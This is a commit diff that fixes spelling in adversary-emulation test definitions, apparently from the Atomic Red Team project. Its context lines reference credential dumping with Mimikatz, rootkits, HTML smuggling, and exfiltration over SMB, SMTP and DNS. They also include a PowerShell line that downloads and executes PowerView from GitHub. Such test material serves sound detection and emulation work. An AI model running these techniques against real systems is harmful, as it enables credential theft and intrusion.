Spelling adjustments (#2448)

Looking over the YAMLs mostly, only changes for readability or accuracy
2023-05-31 16:50:22 -04:00
parent 1c1f63ede7
commit 65294196d0
14 changed files with 18 additions and 18 deletions
@@ -183,7 +183,7 @@ atomic_tests:

    Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.

-    Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
+    Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
  supported_platforms:
  - windows
  dependency_executor_name: command_prompt
@@ -274,7 +274,7 @@ atomic_tests:
    Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
    If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
    Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. 
-    Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
+    Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
  supported_platforms:
  - windows
  input_arguments:
@@ -49,7 +49,7 @@ atomic_tests:
  description: |
    The following Atomic will run Get-ADReplAccount from DSInternals.
    Upon successful execution, domain and credentials will appear in stdout. 
-    [Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.
+    [Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellarParticle.
    https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
  supported_platforms:
  - windows
@@ -9,7 +9,7 @@ atomic_tests:
  - linux
  input_arguments:
    rootkit_source_path:
-      description: Path to the rootkit source. Used when prerequistes are fetched.
+      description: Path to the rootkit source. Used when prerequisites are fetched.
      type: path
      default: PathToAtomicsFolder/T1014/src/Linux
    rootkit_path:
@@ -51,7 +51,7 @@ atomic_tests:
  - linux
  input_arguments:
    rootkit_source_path:
-      description: Path to the rootkit source. Used when prerequistes are fetched.
+      description: Path to the rootkit source. Used when prerequisites are fetched.
      type: path
      default: PathToAtomicsFolder/T1014/src/Linux
    rootkit_name:
@@ -378,7 +378,7 @@ sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
 <br/>

 ## Atomic Test #9 - DNS Server Discovery Using nslookup
-Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain
+Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by Qakbot malware to gather information on the domain
 controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/

 **Supported Platforms:** Windows
@@ -748,7 +748,7 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/R
 <br/>
 <br/>

-## Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers
+## Atomic Test #19 - Get-WmiObject to Enumerate Domain Controllers
 The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
 Upon successful execution a listing of Systems from AD will output with their paths.
 Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
@@ -362,7 +362,7 @@ atomic_tests:
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
    name: powershell
- name: Get-wmiobject to Enumerate Domain Controllers
+- name: Get-WmiObject to Enumerate Domain Controllers
  auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
  description: |
    The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
@@ -37,7 +37,7 @@ atomic_tests:
  description: |
    When C# is compiled dynamically, a .cmdline file will be created as a part of the process. 
    Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.
-    The exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
+    The exe file that will be executed is named as T1027.004_DynamicCompile.exe is contained in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
    Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
  supported_platforms:
  - windows
@@ -5,7 +5,7 @@ atomic_tests:
 - name: HTML Smuggling Remote Payload
  auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
  description: |
-    The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without userinteraction. 
+    The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without user interaction. 
    The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
  supported_platforms:
  - windows
@@ -188,7 +188,7 @@ atomic_tests:
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    local_path:
-      description: Local path/filename to save the dowloaded file to
+      description: Local path/filename to save the downloaded file to
      type: path
      default: Atomic-license.txt
  executor:
@@ -1,7 +1,7 @@
 attack_technique: T1039
 display_name: Data from Network Shared Drive
 atomic_tests:
- name: Copy a sensitive File over Administive share with copy
+- name: Copy a sensitive File over Administrative share with copy
  auto_generated_guid: 6ed67921-1774-44ba-bac6-adb51ed60660
  description: |-
    Copy from sensitive File from the c$ of another LAN computer with copy cmd
@@ -43,7 +43,7 @@ atomic_tests:
      del %TEMP%\#{local_file}
    name: command_prompt
    elevation_required: true
- name: Copy a sensitive File over Administive share with Powershell
+- name: Copy a sensitive File over Administrative share with Powershell
  auto_generated_guid: 7762e120-5879-44ff-97f8-008b401b9a98
  description: |-
    Copy from sensitive File from the c$ of another LAN computer with powershell
@@ -24,7 +24,7 @@ atomic_tests:
  description: |
    Scan ports to check for listening ports with Nmap.

-    Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
+    Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
  supported_platforms:
  - linux
  - macos
@@ -167,7 +167,7 @@ atomic_tests:
      fruit -noninteractive -consoleoutput
    name: powershell
 - name: Network Service Discovery for Containers
-  auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
+  auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
  description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
  supported_platforms:
  - containers
@@ -41,7 +41,7 @@ atomic_tests:
    When the test completes, a service information will be displayed on the screen if it exists.
    A common feedback message is that "No instance(s) Available" if the service queried is not running.
    A common error message is "Node - (provided IP or default)  ERROR Description =The RPC server is unavailable" 
-    if the provided remote host is unreacheable
+    if the provided remote host is unreachable
  supported_platforms:
  - windows
  input_arguments:
@@ -92,7 +92,7 @@ atomic_tests:
  auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
  description: |
    Exfiltration of specified file over SMTP.
-    Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
+    Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.
  supported_platforms:
  - windows
  executor:
@@ -52,7 +52,7 @@ atomic_tests:
 - name: DNSExfiltration (doh)
  auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48
  description: |
-    DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
+    DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
    !!! Test will fail without a domain under your control with A record and NS record !!! 
    See this github page for more details - https://github.com/Arno0x/DNSExfiltrator
  supported_platforms: